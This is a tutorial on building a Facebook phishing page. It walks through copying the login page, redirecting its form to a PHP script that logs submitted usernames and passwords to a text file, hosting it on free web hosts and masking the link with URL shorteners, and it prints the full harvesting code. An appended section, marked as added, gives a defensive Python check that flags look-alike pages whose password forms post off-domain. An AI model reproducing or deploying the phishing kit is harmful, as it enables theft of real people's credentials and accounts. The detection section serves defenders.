Simple Phishing attack


If you are from a computer science background, you might have come across the term “phishing”. Phishing is the act of illegally acquiring information such as bank card details, usernames, passwords, etc. from an individual. In this ethical hacking project, we will create a phishing page of Facebook to acquire the username and login credentials of the victim. This project is for educational purposes only; don’t misuse it.


The following are the target areas where phishing attacks are performed: social networking sites, online payment sites, banking sites, online shopping sites, etc. This phishing technique is carried out by sending a link to the victim via email or messaging applications.

Now imagine that you are the victim. You receive a phishing scam link by mail, and the mail ID looks genuine, similar to the mails from banks or shopping sites. Phishing links mostly redirect to a site that looks similar to the original site. When you try to log in to the site using your login credentials, the hacker gets your details and accesses your account illegally.

Following are the different types of phishing:

  • Man-In-The-Middle: In this method, the hacker stays between the victim and the website and acquires the sensitive information when the user tries to access the site.
  • Phishing using Keylogger: Here the phisher uses keylogger software, which records all the keystrokes made by the user on the computer and sends them to the hacker.
  • Content injection: In this method, the phisher alters the content on the webpage (not by hacking the site) and redirects the victim outside of the page to acquire sensitive information.
  • Phone-based phishing: Here the phisher calls the victim with the help of a fake caller ID and collects the sensitive information from the user.
  • Instant messaging: This is a widely used phishing method where the user gets a phishing link that redirects him to a fake site that looks similar to the original site, where the hacker acquires the sensitive information.

Project Implementation:

Following are the procedures to create a phishing web page of Facebook:

  • Download the HTML index of the Facebook login page
  • Create a PHP file to fetch the password
  • Modify the HTML file to insert the PHP code
  • Host the phishing page

The first step is to download the HTML code of the Facebook login page. For that, go to facebook.com, right-click > view source page. Copy-paste the entire code into notepad.

Now find the following line inside the quotation marks, “https://www.facebook.com/login.php?login_attempt=1”, and replace it with “post.php”. Then save the file, naming it index.html.

Next, we will create a PHP file to fetch the password. For that, create a new notepad file, paste the following code into it, and save it as post.php.

<?php

header (‘Location:http://www.facebook.com/’);

$handle = fopen(“usernames.txt”, “a”);

foreach($_POST as $variable => $value)

{

fwrite($handle, $variable);

fwrite($handle, “=”);

fwrite($handle, $value);

fwrite($handle, “rn”);

}

fwrite($handle, “rn”);

fclose($handle);

exit;

?>

The above code takes the username and password and then saves them in a separate .txt file.

The phishing webpage is now ready to upload. You can use free web hosting services like Freehosting.com, Hostinger.com, 000webhost.com, Freehostia.com, InfinityFree.net, etc.

Create an account on one of the above-mentioned free web hosting sites. Navigate to the file manager, delete the default files, then upload the two files which you have created.

Now you can use the URL of that page to collect the sensitive information from the victims. Phishers mostly use URL shorteners to make the link look similar to the original links.
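
Seen from the defender's side, the page built above has a recognizable shape: it shows the Facebook name and a password field, but its form posts to post.php on the hosting site instead of facebook.com. The following Python check for that shape is an added example, not part of the original project; the function names, the .invalid host and the sample HTML are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

class FormScan(HTMLParser):
    """Record each <form>'s action and whether it holds a password input."""
    def __init__(self):
        super().__init__()
        self.forms = []        # [action, has_password_field] per form
        self._current = None
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = [a.get("action") or "", False]
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current[1] = True
    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

def host_matches(host, domains):
    """True only for an exact domain or a true subdomain of one."""
    host = (host or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)

def off_brand_password_forms(page_url, html, brand, brand_domains):
    """Resolved targets of password forms on a brand-named page that
    would send the credentials to a host outside brand_domains."""
    if brand.lower() not in html.lower():
        return []
    scan = FormScan()
    scan.feed(html)
    hits = []
    for action, has_password in scan.forms:
        target = urljoin(page_url, action)   # relative action -> page's own host
        if has_password and not host_matches(urlparse(target).hostname, brand_domains):
            hits.append(target)
    return hits

# Constructed samples: a look-alike page and the genuine form target.
LOOKALIKE_URL = "http://fb-login.freehost.invalid/index.html"
LOOKALIKE_HTML = ('<title>Facebook - log in</title><form action="post.php" method="post">'
                  '<input name="email"><input type="password" name="pass"></form>')
GENUINE_URL = "https://www.facebook.com/"
GENUINE_HTML = LOOKALIKE_HTML.replace(
    "post.php", "https://www.facebook.com/login.php?login_attempt=1")

if __name__ == "__main__":
    print(off_brand_password_forms(LOOKALIKE_URL, LOOKALIKE_HTML, "facebook", ["facebook.com"]))
    print(off_brand_password_forms(GENUINE_URL, GENUINE_HTML, "facebook", ["facebook.com"]))
```

A mail gateway or web proxy can run this kind of check on fetched pages; the suffix test in host_matches is what keeps a host such as facebook.com.fb-login.invalid from passing as the real domain.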

